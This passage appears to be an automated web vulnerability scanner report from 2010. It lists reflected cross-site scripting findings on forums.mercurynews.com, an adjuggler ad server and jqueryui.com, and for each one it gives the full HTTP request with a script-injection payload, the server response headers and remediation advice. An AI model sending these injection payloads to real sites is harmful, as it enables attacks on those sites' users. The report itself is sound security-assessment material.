Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19412
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4a7"-alert(1)-"28a781fd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3d4"-alert(1)-"47d584067f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22218
3.117. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20852"-alert(1)-"14a59680a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23285
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a503"-alert(1)-"208a5264286 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic4a503"-alert(1)-"208a5264286/war-crisis-in-september HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33de"-alert(1)-"add33b46077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136
3.120. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /topic/war-crisis-in-september
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57abb"-alert(1)-"ea4b545c8c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 162532
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34def"-alert(1)-"a6f704bab09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml34def"-alert(1)-"a6f704bab09/comments HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df349"-alert(1)-"078e172cde1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/commentsdf349"-alert(1)-"078e172cde1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102
3.123. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /xml/comments
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a8b"-alert(1)-"d726d012b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/comments?c1a8b"-alert(1)-"d726d012b6=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff9b"-alert(1)-"3afa300d7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml2ff9b"-alert(1)-"3afa300d7b5/poll-link HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4083"-alert(1)-"6c029440ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/poll-linka4083"-alert(1)-"6c029440ed4 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104
3.126. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /xml/poll-link
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82efb"-alert(1)-"694f25fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/poll-link?82efb"-alert(1)-"694f25fe67=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22070
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11905<script>alert(1)</script>ed7f0af6221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 02:07:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1> <pre>Resource /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ not found</pre> <BR>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c2fc<script>alert(1)</script>bfbfed47bf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 02:07:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df060<script>alert(1)</script>065331fd6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 760f3<script>alert(1)</script>595ff3ead2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pubclick request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b7c'-alert(1)-'7a94292f04 was submitted in the pubclick parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892af"%3balert(1)//60d6637fe36 was submitted in the mpck parameter. This input was echoed as 892af";alert(1)//60d6637fe36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44c0"><script>alert(1)</script>907f9db44a1 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e58c7"%3balert(1)//4841a3488a4 was submitted in the mpvc parameter. This input was echoed as e58c7";alert(1)//4841a3488a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715f3"><script>alert(1)</script>d0be7b9b1b0 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73316"><script>alert(1)</script>6045c0d1b5 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a73316"><script>alert(1)</script>6045c0d1b5&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15638"><script>alert(1)</script>d1337495d25 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f715638"><script>alert(1)</script>d1337495d25&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bf5"><script>alert(1)</script>5b6241fd956 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d851bf5"><script>alert(1)</script>5b6241fd956&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130
